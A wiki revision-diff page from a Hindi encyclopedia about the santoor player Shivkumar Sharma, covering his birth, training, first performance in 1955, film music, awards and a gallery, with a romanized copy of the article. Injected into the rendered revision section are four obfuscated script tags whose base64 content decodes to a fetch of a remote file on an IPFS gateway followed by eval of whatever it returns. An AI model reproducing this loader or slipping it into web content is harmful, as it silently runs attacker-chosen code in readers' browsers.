Difference between revisions of "शिवकुमार शर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (शिव कुमार शर्मा का नाम बदलकर शिवकुमार शर्मा कर दिया गया है)
Line 7: Line 7:
 
|जन्म=[[13 जनवरी]], 1938
 
|जन्म=[[13 जनवरी]], 1938
 
|जन्म भूमि=[[जम्मू]]  
 
|जन्म भूमि=[[जम्मू]]  
|अविभावक=ऊमा दत्त शर्मा
+
|अविभावक=उमा दत्त शर्मा
 
|पति/पत्नी= मनोरमा  
 
|पति/पत्नी= मनोरमा  
|संतान= राहुल
+
|संतान=
 
|कर्म भूमि=
 
|कर्म भूमि=
|कर्म-क्षेत्र=  
+
|कर्म-क्षेत्र=संगीतज्ञ
 
|मृत्यु=  
 
|मृत्यु=  
 
|मृत्यु स्थान=  
 
|मृत्यु स्थान=  
Line 24: Line 24:
 
|नागरिकता=भारतीय  
 
|नागरिकता=भारतीय  
 
|संबंधित लेख=  
 
|संबंधित लेख=  
|शीर्षक 1=  
+
|शीर्षक 1=सक्रिय वर्ष
|पाठ 1=  
+
|पाठ 1= 1955–वर्तमान
|शीर्षक 2=
+
|शीर्षक 2=प्रथम प्रस्तुति
|पाठ 2=
+
|पाठ 2=[[मुंबई]] में वर्ष 1955 में
|अन्य जानकारी=  
+
|अन्य जानकारी=13 वर्ष की आयु में संतूर सीखना शुरू कर दिया तथा अपनी माँ का सपना पूरा किया।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन=  
+
|अद्यतन= {{अद्यतन|13:22, 25 जनवरी 2012 (IST)}}
 
}}
 
}}
 
'''शिवकुमार शर्मा''' (जन्म- [[13 जनवरी]], 1938) [[भारत]] के प्रसिद्ध [[संतूर]] वादक है। आज संतूर की लोकप्रियता का सर्वाधिक श्रेय शिवकुमार शर्मा को ही जाता है। उन्होंने संतूर को शास्त्रीय संगीत के अनुकूल बनाने के लिये इसमें कुछ परिवर्तन भी किये।  
 
'''शिवकुमार शर्मा''' (जन्म- [[13 जनवरी]], 1938) [[भारत]] के प्रसिद्ध [[संतूर]] वादक है। आज संतूर की लोकप्रियता का सर्वाधिक श्रेय शिवकुमार शर्मा को ही जाता है। उन्होंने संतूर को शास्त्रीय संगीत के अनुकूल बनाने के लिये इसमें कुछ परिवर्तन भी किये।  
 
==जीवन परिचय==
 
==जीवन परिचय==
शिवकुमार शर्मा का जन्म 13 जनवरी 1938 को [[जम्मू]] में हुआ था। शिवकुमार शर्मा की माता जी श्रीमती ऊमा दत्त शर्मा स्वयं एक शास्त्रीय गायिका थीं जो बनारस घराने से संबंध रखती थीं। 4 वर्ष कि अल्पायु से ही शिवकुमार शर्मा ने अपने पिता से गायन व [[तबला]] वादन सीखना प्रारंभ कर दिया था।  
+
शिवकुमार शर्मा का जन्म 13 जनवरी 1938 को [[जम्मू]] में हुआ था। शिवकुमार शर्मा की माता जी श्रीमती उमा दत्त शर्मा स्वयं एक शास्त्रीय गायिका थीं जो बनारस घराने से संबंध रखती थीं। 4 वर्ष कि अल्पायु से ही शिवकुमार शर्मा ने अपने पिता से गायन व [[तबला]] वादन सीखना प्रारंभ कर दिया था।  
 
====महत्वाकांक्षा====
 
====महत्वाकांक्षा====
 
शिवकुमार शर्मा ने एक साक्षात्कार में बताया था कि उनकी माँ का यह सपना था कि वे भारतीय शास्त्रीय संगीत को संतूर पर बजाने वाले प्रथम संगीतज्ञ बनें। इस प्रकार उन्होंने 13 वर्ष की आयु में संतूर सीखना शुरू कर दिया तथा अपनी माँ का सपना पूरा किया।  
 
शिवकुमार शर्मा ने एक साक्षात्कार में बताया था कि उनकी माँ का यह सपना था कि वे भारतीय शास्त्रीय संगीत को संतूर पर बजाने वाले प्रथम संगीतज्ञ बनें। इस प्रकार उन्होंने 13 वर्ष की आयु में संतूर सीखना शुरू कर दिया तथा अपनी माँ का सपना पूरा किया।  
 
====प्रथम प्रस्तुति====
 
====प्रथम प्रस्तुति====
 
शिवकुमार शर्मा ने अपनी प्रथम सार्वजनिक प्रस्तुति [[मुंबई]] में वर्ष 1955 में दी।  
 
शिवकुमार शर्मा ने अपनी प्रथम सार्वजनिक प्रस्तुति [[मुंबई]] में वर्ष 1955 में दी।  
 +
====फ़िल्मों में संगीत====
 +
शिवकुमार शर्मा ने फासले, सिलसिला, लम्हे, चांदनी, डर, आदि हिन्दी फ़िल्मों में प्रसिद्ध संगीत दिया है।
 
==सम्मान एवं पुरस्कार==
 
==सम्मान एवं पुरस्कार==
 
शिवकुमार शर्मा को कई राष्ट्रीय व अंतर्राष्ट्रीय पुरस्कारों से सम्मानित किया जा चुका है।  
 
शिवकुमार शर्मा को कई राष्ट्रीय व अंतर्राष्ट्रीय पुरस्कारों से सम्मानित किया जा चुका है।  
Line 49: Line 51:
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Shivkumar-Sharma-1.jpg|शिवकुमार शर्मा
 +
चित्र:Shivkumar-Sharma-2.jpg|शिवकुमार शर्मा
 +
चित्र:Shivkumar-Sharma-And-Rahul-Sharma.jpg|जुगलबंदी करते शिवकुमार शर्मा और राहुल शर्मा
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 07:52, 25 January 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shivakumar sharma
poora nam pandit shivakumar sharma
janm 13 janavari, 1938
janm bhoomi jammoo
pati/patni manorama
karm-kshetr sangitajn
puraskar-upadhi sangit natak akadami puraskar, padm shri, padm vibhooshan
prasiddhi santoor vadak
nagarikata bharatiy
sakriy varsh 1955–vartaman
pratham prastuti muanbee mean varsh 1955 mean
any janakari 13 varsh ki ayu mean santoor sikhana shuroo kar diya tatha apani maan ka sapana poora kiya.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shivakumar sharma (janm- 13 janavari, 1938) bharat ke prasiddh santoor vadak hai. aj santoor ki lokapriyata ka sarvadhik shrey shivakumar sharma ko hi jata hai. unhoanne santoor ko shastriy sangit ke anukool banane ke liye isamean kuchh parivartan bhi kiye.

jivan parichay

shivakumar sharma ka janm 13 janavari 1938 ko jammoo mean hua tha. shivakumar sharma ki mata ji shrimati uma datt sharma svayan ek shastriy gayika thian jo banaras gharane se sanbandh rakhati thian. 4 varsh ki alpayu se hi shivakumar sharma ne apane pita se gayan v tabala vadan sikhana praranbh kar diya tha.

mahatvakaanksha

shivakumar sharma ne ek sakshatkar mean bataya tha ki unaki maan ka yah sapana tha ki ve bharatiy shastriy sangit ko santoor par bajane vale pratham sangitajn banean. is prakar unhoanne 13 varsh ki ayu mean santoor sikhana shuroo kar diya tatha apani maan ka sapana poora kiya.

pratham prastuti

shivakumar sharma ne apani pratham sarvajanik prastuti muanbee mean varsh 1955 mean di.

filmoan mean sangit

shivakumar sharma ne phasale, silasila, lamhe, chaandani, dar, adi hindi filmoan mean prasiddh sangit diya hai.

samman evan puraskar

shivakumar sharma ko kee rashtriy v aantarrashtriy puraskaroan se sammanit kiya ja chuka hai.

  • san 1985 mean unhean amarika ke bॊltimor shahar ki sammananiy nagarikata pradan ki gee.
  • san 1986 mean shivakumar sharma ko 'sangit natak akadami puraskar' se sammanit kiya gaya.
  • san 1991 mean unhean 'padmashri puraskar' se sammanit kiya gaya.
  • san 2001 mean unhean 'padm vibhooshan puraskar' se sammanit kiya gaya.

pita-putr ki jugalabandi

shivakumar sharma ne anokhe santoor vadan ki kala-virasat apane suputr rahul ko bhi apana shishy banakar pradan ki tatha pita-putr ki is jo di ne varsh 1996 se sath-sath santoor-vadan karate a rahe haian. shivakumar sharma ne rahul ko eeshvar ka varadan manate hue apana shishy banaya aur santoor-vadan mean parangat kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh